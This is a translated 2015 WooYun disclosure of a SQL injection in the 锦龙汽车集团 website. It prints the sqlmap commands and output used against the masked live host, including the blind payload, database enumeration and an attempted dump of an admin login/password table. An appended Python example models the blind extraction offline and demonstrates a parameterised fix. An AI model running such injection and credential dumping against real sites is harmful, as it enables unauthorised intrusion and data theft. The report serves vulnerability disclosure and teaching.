
Vulnerability summary

Defect ID: wooyun-2015-0142180

Title: SQL injection vulnerability in the 锦龙汽车集团 (Kamlung) website

Vendor: cncert国家互联网应急中心 (CNCERT, the National Internet Emergency Center)

Author: 路人甲

Submitted: 2015-09-24 23:59

Fix time: 2015-11-09 17:46

Published: 2015-11-09 17:46

Type: SQL injection

Severity (self-assessed): High

Self-rated Rank: 15

Status: handed over to a third-party partner organisation (cncert国家互联网应急中心) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2015-09-24: details sent to the vendor, awaiting vendor handling
2015-09-25: cncert国家互联网应急中心 was not yet able to reach the affected organisation; details disclosed only to the reporting body
2015-10-05: details disclosed to core white hats and domain experts
2015-10-15: details disclosed to regular white hats
2015-10-25: details disclosed to intern white hats
2015-11-09: details disclosed to the public

Summary:

The 锦龙汽车集团 website has a SQL injection vulnerability.

Details:

http://**.**.**.**/sc/media_news_detail.php?id=5480
The id parameter is injectable. It is a boolean-based blind injection, so every byte has to be inferred from true/false differences in the page, which makes extraction painfully slow (the runs below take minutes per value and hit repeated connection timeouts).
The site also shows little regard for security: it shares its database server with unrelated sites (the enumerated databases include seasawcn and www_kamlung_com next to kamlung_net, plus the SQL Server 2000 sample databases Northwind and pubs).
Note that table enumeration returned dbo.admin, while the dump attempt was run against db.admin; it recovered the columns id, login and password but could not retrieve the row count.

Proof of concept:

D:\tool\sqlmap>sqlmap.py -u http://**.**.**.**/sc/media_news_detail.php?id=5480
[sqlmap banner] {1.0-dev-nongit-20150821} http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 09:04:36
[09:04:37] [INFO] testing connection to the target URL
[09:04:40] [INFO] testing if the target URL is stable
[09:04:50] [INFO] target URL is stable
[09:04:50] [INFO] testing if GET parameter 'id' is dynamic
[09:04:55] [INFO] confirming that GET parameter 'id' is dynamic
[09:04:55] [WARNING] GET parameter 'id' does not appear dynamic
[09:04:56] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[09:04:56] [INFO] testing for SQL injection on GET parameter 'id'
[09:04:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:05:24] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[09:05:24] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[09:05:31] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[09:05:31] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[09:05:33] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[09:05:33] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[09:05:34] [INFO] testing 'MySQL inline queries'
[09:05:35] [INFO] testing 'PostgreSQL inline queries'
[09:05:39] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[09:05:48] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[09:05:48] [WARNING] time-based comparison requires larger statistical model, please wait............
[09:06:02] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[09:06:05] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[09:06:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[09:06:11] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[09:06:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[09:06:13] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[09:06:16] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[09:06:22] [INFO] testing 'Oracle AND time-based blind'
[09:06:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:06:25] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[09:06:25] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:08:19] [INFO] target URL appears to be UNION injectable with 15 columns
[09:08:19] [WARNING] applying generic concatenation with double pipes ('||')
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[09:17:13] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[09:17:13] [INFO] testing 'MySQL UNION query (16) - 1 to 20 columns'
[09:17:56] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 142 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=5480 AND 4372=4372
---
[09:19:33] [INFO] testing MySQL
[09:19:40] [WARNING] the back-end DBMS is not MySQL
[09:19:40] [INFO] testing Oracle
[09:19:50] [WARNING] the back-end DBMS is not Oracle
[09:19:50] [INFO] testing PostgreSQL
[09:19:50] [WARNING] the back-end DBMS is not PostgreSQL
[09:19:50] [INFO] testing Microsoft SQL Server
[09:19:51] [INFO] confirming Microsoft SQL Server
[09:20:13] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:20:23] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: Microsoft SQL Server 2000
[09:20:23] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\**.**.**.**'
[*] shutting down at 09:20:23
D:\tool\sqlmap>sqlmap.py -u http://**.**.**.**/sc/media_news_detail.php?id=5480 --dbs
[*] starting at 09:21:40
[09:21:40] [INFO] resuming back-end DBMS 'microsoft sql server'
[09:21:40] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=5480 AND 4372=4372
---
[09:21:42] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: Microsoft SQL Server 2000
[09:21:42] [INFO] fetching database names
[09:21:42] [INFO] fetching number of databases
[09:21:42] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:21:42] [INFO] retrieved: 9
[09:21:54] [INFO] retrieved: kamlung_net
[09:25:48] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:26:12] [INFO] retrieved: master
[09:28:28] [INFO] retrieved: model
[09:29:37] [INFO] retrieved: msdb
[09:31:20] [INFO] retrieved: Northwind
[09:35:26] [INFO] retrieved: pubs
[09:37:57] [INFO] retrieved: seasawcn
[09:40:42] [INFO] retrieved: tempdb
[09:43:34] [INFO] retrieved: www_kamlung_com
[09:44:35] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
available databases [9]:
[*] kamlung_net
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] seasawcn
[*] tempdb
[*] www_kamlung_com
[09:51:11] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\**.**.**.**'
[*] shutting down at 09:51:11
D:\tool\sqlmap>sqlmap.py -u http://**.**.**.**/sc/media_news_detail.php?id=5480 --current-db
[*] starting at 09:55:23
[09:55:24] [INFO] resuming back-end DBMS 'microsoft sql server'
[09:55:24] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=5480 AND 4372=4372
---
[09:55:53] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: Microsoft SQL Server 2000
[09:55:53] [INFO] fetching current database
[09:55:53] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:55:53] [INFO] retrieved: kamlung_ne
[10:01:40] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[10:03:09] [ERROR] user aborted
[*] shutting down at 10:03:09
D:\tool\sqlmap>sqlmap.py -u http://**.**.**.**/sc/media_news_detail.php?id=5480 -D kamlung_net --tables
[*] starting at 10:05:43
[10:05:43] [INFO] resuming back-end DBMS 'microsoft sql server'
[10:05:44] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=5480 AND 4372=4372
---
[10:06:00] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: Microsoft SQL Server 2000
[10:06:00] [INFO] fetching tables for database: kamlung_net
[10:06:00] [INFO] fetching number of tables for database 'kamlung_net'
[10:06:00] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[10:06:00] [INFO] retrieved: 20
[10:06:33] [INFO] retrieved: dbo.admin
[10:07:58] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[10:10:01] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[10:14:31] [INFO] retrieved: dbo.b
[10:16:14] [ERROR] user aborted
[*] shutting down at 10:16:14
D:\tool\sqlmap>sqlmap.py -u http://**.**.**.**/sc/media_news_detail.php?id=5480 -D kamlung_net -T db.admin --dump
[*] starting at 10:16:30
[10:16:30] [INFO] resuming back-end DBMS 'microsoft sql server'
[10:16:30] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=5480 AND 4372=4372
---
[10:16:38] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: Microsoft SQL Server 2000
[10:16:38] [INFO] fetching columns for table 'db.admin' in database 'kamlung_net'
[10:16:38] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[10:16:38] [INFO] retrieved: 3
[10:17:06] [INFO] retrieved: id
[10:19:00] [INFO] retrieved: login
[10:22:40] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[10:23:03] [INFO] retrieved: password
[10:27:41] [INFO] fetching entries for table 'db.admin' in database 'kamlung_net'
[10:27:41] [INFO] fetching number of entries for table 'db.admin' in database 'kamlung_net'
[10:27:41] [INFO] retrieved:
[10:27:47] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[10:27:47] [WARNING] unable to retrieve the number of entries for table 'db.admin' in database 'kamlung_net'
[10:27:47] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\**.**.**.**'
[*] shutting down at 10:27:47

Remediation:

Filter the input: validate id as an integer and, preferably, bind it as a query parameter (prepared statement) instead of building the SQL string by concatenation; character filtering alone is not a reliable fix.
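The blind extraction described in the details section and the parameterised fix recommended above, as an added worked example in Python that is not part of the original report and not the target site's code. The page never shows the PHP/MSSQL handler behind media_news_detail.php, so the handler is modelled over an in-memory SQLite database standing in for Microsoft SQL Server 2000, with T-SQL's DB_NAME(), LEN(), ASCII() and SUBSTRING() registered as SQLite functions so the injected conditions keep MSSQL syntax; the news table, the row id 5480 and the recovered name kamlung_net are constructed for the example. It runs the same tautology check sqlmap used (id=5480 AND 4372=4372 versus a false condition), recovers the database name by bisection on each character code, counts the requests that takes, and shows that the integer-validated, parameter-bound handler gives the attacker no oracle at all.

```python
"""
Boolean-based blind SQL injection, modelled offline.

Added example for this report, not code from the original page or from the
target site. SQLite stands in for Microsoft SQL Server 2000; the table,
the row id 5480 and the database name are constructed for the example.
"""
import sqlite3

# Constructed stand-in for the secret we want to leak (assumption: the
# name sqlmap recovered in the report).
DB_NAME = "kamlung_net"

conn = sqlite3.connect(":memory:", check_same_thread=False)
conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
conn.execute("INSERT INTO news VALUES (5480, 'constructed press release')")
conn.commit()
# MSSQL-style helpers so the injected conditions read like real T-SQL.
conn.create_function("DB_NAME", 0, lambda: DB_NAME)
conn.create_function("LEN", 1, lambda s: len(s))
conn.create_function("ASCII", 1, lambda s: ord(s[0]) if s else 0)
conn.create_function("SUBSTRING", 3,
                     lambda s, start, n: s[start - 1:start - 1 + n])


def vulnerable_detail(id_param: str) -> bool:
    """Models the flawed pattern: the raw GET parameter is concatenated
    into the query. True means an article would be rendered (row found),
    False means an empty page, which is all a blind attacker needs."""
    sql = "SELECT title FROM news WHERE id=" + id_param
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # a SQL error also renders as "no article"


def fixed_detail(id_param: str) -> bool:
    """Hardened handler: reject anything that is not an integer, then bind
    the value as a parameter instead of splicing it into the SQL text."""
    if not id_param.isdigit():
        return False
    row = conn.execute("SELECT title FROM news WHERE id=?",
                       (int(id_param),)).fetchone()
    return row is not None


def extract_string(expr: str, handler=vulnerable_detail, max_len=64):
    """Recover the string value of a SQL expression (e.g. "DB_NAME()")
    from nothing but the true/false answers of `handler`, the way
    sqlmap's boolean-based blind technique does. Returns
    (value, request_count); value is None when there is no oracle."""
    requests = 0

    def ask(condition: str) -> bool:
        nonlocal requests
        requests += 1
        return handler(f"5480 AND {condition}")  # one HTTP request for real

    def bisect(predicate_fmt: str, hi: int) -> int:
        # Smallest v in [0, hi] for which "<expr> > v" is false, i.e. the
        # value itself; ceil(log2(hi + 1)) requests per value.
        lo = 0
        while lo < hi:
            mid = (lo + hi) // 2
            if ask(predicate_fmt.format(mid)):
                lo = mid + 1
            else:
                hi = mid
        return lo

    # Sanity check, as sqlmap does with "AND 4372=4372": a tautology and a
    # contradiction must yield different pages or there is no oracle.
    if not (ask("1=1") and not ask("1=2")):
        return None, requests

    length = bisect(f"LEN({expr})>{{}}", max_len)
    chars = []
    for i in range(1, length + 1):
        code = bisect(f"ASCII(SUBSTRING({expr},{i},1))>{{}}", 127)
        chars.append(chr(code))
    return "".join(chars), requests


if __name__ == "__main__":
    value, n = extract_string("DB_NAME()")
    print(f"vulnerable handler leaked {value!r} in {n} requests")
    value, n = extract_string("DB_NAME()", handler=fixed_detail)
    print(f"fixed handler leaked {value!r} after {n} request(s)")
```

Run it directly to see the two handlers side by side. Bisection costs seven requests per character, so an eleven-character name costs over eighty round trips; that is why the single-threaded runs in the proof above need minutes per value and stall on every connection timeout, and why sqlmap keeps suggesting --threads.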

Copyright: please credit 路人甲@乌云 when reposting.


Vulnerability response

Vendor response:

Severity: Medium

Rank: 8

Confirmed: 2015-09-25 17:44

Vendor reply:

No direct handling channel with the organisation that runs the website has been established yet; awaiting claim.

Latest status:

None